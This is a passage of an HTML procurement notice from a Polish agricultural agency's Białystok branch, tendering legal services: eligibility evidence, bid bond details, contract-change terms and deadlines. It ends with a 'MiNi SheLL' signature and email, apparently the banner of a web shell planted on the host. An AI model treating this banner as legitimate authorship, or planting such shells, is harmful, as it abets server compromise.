ust. 1, stanowi dowód potwierdzający brak podstaw wykluczenia z postępowania oraz spełniania warunków udziału w postępowaniu na dzień składania ofert oraz tymczasowo zastępuje wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w ust. 1, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca przedstawia, wraz z oświadczeniem, o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, z którego musi wynikać, które usługi wykonają poszczególni Wykonawcy.<br/>6. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca, realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>7. W celu potwierdzenia spełniania przez Wykonawcę warunku udziału<br/>w postępowaniu dotyczącego zdolności zawodowej w zakresie dysponowania osobami,które zostaną skierowane przez Wykonawcę do pełnienia dyżurów w siedzibie Zamawiającego, Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu<br/>z postępowania oraz spełnianiu warunków udziału w postępowaniu, które stanowi załącznik nr 2 do SWZ. Oświadczenie, o którym mowa w ust. 1, Wykonawca przedkłada wykaz osób, skierowanych przez Wykonawcę do pełnienia dyżurów w siedzibie Zamawiającego, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz ten należy sporządzić zgodnie z ust.<br/>2 Formularza Oferty pn.: „Wykaz osób, skierowanych przez Wykonawcę do<br/>pełnienia dyżurów w siedzibie Zamawiającego”.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej – dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 1 000 000 złotych.<br/>w celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego zdolności zawodowej w zakresie doświadczenia Wykonawcy:<br/>a) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, nieprzerwanie przez okres minimum 12 miesięcy wraz z podaniem ich wartości (co najmniej 150.000 zł brutto), przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane (wzór wykazu usług stanowi załącznik nr 3a do SWZ),<br/>b) wykazu usług zastępstwa procesowego na rzecz podmiotu sektora finansów<br/>publicznych w sprawie cywilnej, wraz z podaniem wartości tej usług (minimum<br/>4.000.000 zł ) i przedmiotu, dat wykonania i podmiotów, (wzór wykazu usług<br/>stanowi załącznik nr 3b do SWZ), oraz<br/>c) wykazu minimum 2 usług polegających na świadczeniu obsługi prawnej<br/>jednostki sektora finansów publicznych, przy czym doświadczenie Wykonawcy obejmuje co najmniej zagadnienia z prawa pracy, finansów publicznych oraz<br/>zamówień publicznych ( wzór wykazu stanowi załącznik nr 3c do SWZ)<br/>d) dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w kwocie 2000,00 zł (słownie: dwa tysiące złotych).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, tj. do dnia określonego w rozdz. XIII ust.1 SWZ, wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego nr 46 1130 1059 0017 3390 1620 0001 z dopiskiem „Wadium w postępowaniu nr BIA.WO.260.2.2025.AMI”.<br/>5.	Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>6.	Jeśli wykonawca wniesie wadium po upływie terminu składania ofert tzn. środki pieniężne wpłyną na rachunek zamawiającego po upływie terminu składania ofert, oferta wykonawcy zostanie odrzucona.<br/>7.	Zamawiający zaleca załączenie do oferty dokumentu potwierdzającego wniesienie wadium w pieniądzu na rachunek bankowy zamawiającego. Czynność ta skróci czas badania ofert.<br/>8.	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być: Krajowy Ośrodek Wsparcia Rolnictwa w Warszawie ul. Karolkowa 30, 01-207 Warszawa, Oddział Terenowy w Białymstoku ul. Gen. G. Orlicz-Dreszera 1 lok. 1, 15-797 Białystok, NIP 5272818355;<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>3) kwotę gwarancji/poręczenia,<br/>4) termin ważności gwarancji/poręczenia,<br/>5) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie Zamawiającego, obejmujące wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp.<br/>9.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>3.	W przypadku, o którym mowa w ust. 2, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie:<br/>1) warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej Wykonawcy wspólnie ubiegający się o zamówienie<br/>musi spełniać każdy z nich;<br/>2) warunek udziału w postępowaniu dotyczący zdolności zawodowej w zakresie doświadczenia Wykonawcy musi spełniać w całości jeden z Wykonawców wspólnie ubiegających się o zamówienie lub podmiot udostępniający Wykonawcom wspólnie ubiegającym się o zamówienie zasoby w postaci doświadczenia;<br/>3) warunek udziału w postępowaniu dotyczący zdolności zawodowej w zakresie dysponowania osobami Wykonawcy wspólnie ubiegający się o zamówienie muszą spełniać łącznie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony dopuszczają możliwość zmiany umowy w sytuacjach przewidzianych przez obowiązujące przepisy prawa oraz jeżeli będzie ona dotyczyła następujących zdarzeń:<br/>1)	wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, w szczególności przepisów dotyczących zamówień publicznych,<br/>2)	zmiany osoby określonej w § 2 ust. 2 umowy wymaga uprzedniej zgody Zamawiającego jak również spełnienia przez nową osobę wymagań z rozdziału XV ust. 9 SWZ na dzień składania ofert,<br/>3)	wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy, w szczególności dotyczącej wynagrodzenia Wykonawcy;<br/>4)	wystąpienia konieczności zmian osoby określonej w § 2 ust. 2 umowy w przypadku, gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób na inne spełniające na dzień składania ofert warunki określone w Specyfikacji Warunków Zamówienia (w rozdziale XV ust. ust. 9 SWZ) w terminie nie dłuższym niż 14 dni od daty złożenia wniosku przez Zamawiającego;<br/>5)	zmiany Zamawiającego w przypadku zmiany organizacyjnej Zamawiającego istotnej dla realizacji niniejszej umowy, w szczególności połączenia, podziału, zmiany nazwy Zamawiającego;<br/>6)	zmiany adresu siedziby firmy Wykonawcy w przypadku zmiany tych danych w trakcie realizacji umowy.<br/>2.	Strony dopuszczają możliwość zmiany wynagrodzenia Wykonawcy w przypadku zmiany stawki podatku od towarów i usług, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę, przy czym wniosek o zmianę wysokości powinien wykazywać, że zamiany rzeczywiście wpływają na koszt wykonywania zamówienia przez Wykonawcę i w jakiej wysokości.<br/>3.	Zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności takiej zmiany, chyba, że ustalenia szczegółowe umowy stanowią inaczej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem platformy zakupowej dostępnej pod adresem https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com